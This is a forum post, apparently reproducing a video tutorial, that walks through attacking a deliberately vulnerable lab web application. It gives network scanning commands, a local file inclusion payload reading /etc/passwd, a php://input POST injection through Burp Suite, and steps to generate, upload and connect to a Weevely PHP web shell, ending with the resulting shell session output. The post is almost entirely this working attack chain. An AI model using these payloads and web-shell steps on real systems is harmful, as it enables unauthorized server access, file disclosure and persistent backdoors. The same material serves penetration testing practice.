Jump to content
Wubi

From LFI to PHP Shell using Burp Suite and Weevely (Superveda 2012)

By Wubi, in Tutoriale video

Recommended Posts

Wubi Newbie

Wubi

Posted
Posted



From LFI to remote code excution with php://input POST request (super veda2012 test application) :

Tools:
Netdiscover
nmap
Burp Suite
Weevely tiny web shell
Firefox

Attacker ip addr : 192.168.42.130
netdiscover -r 192.168.42.0
nmap -sS -sV -p 80 192.168.42.132
firefox 192.168.42.132
192.168.42.132/pressreleases/showPressRelease.php?releaseID=/etc/passwd%00
open burp
Use repeater to post request :
POST /pressreleases/showPressRelease.php?releaseID=php://input%00 HTTP/1.1

Create php shell:
cd /pentest/web/backdoors/weevely/
./weevely.py generate mypass /var/www/shell.txt

Upload shell with burp post request:
POST /pressreleases/showPressRelease.php?releaseID=php://input%00 HTTP/1.1

Connecto to shell:
./weevely.py http://192.168.42.132/pressreleases/shell.php mypass

apache@localhost.localdomain:/var/www/html/pressreleases$ ls
1.php
2.php
3.php
default.php
index.php
shell.php
showPressRelease.php
thumbs
apache@localhost.localdomain:/var/www/html/pressreleases$


Sursa YouTube
  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...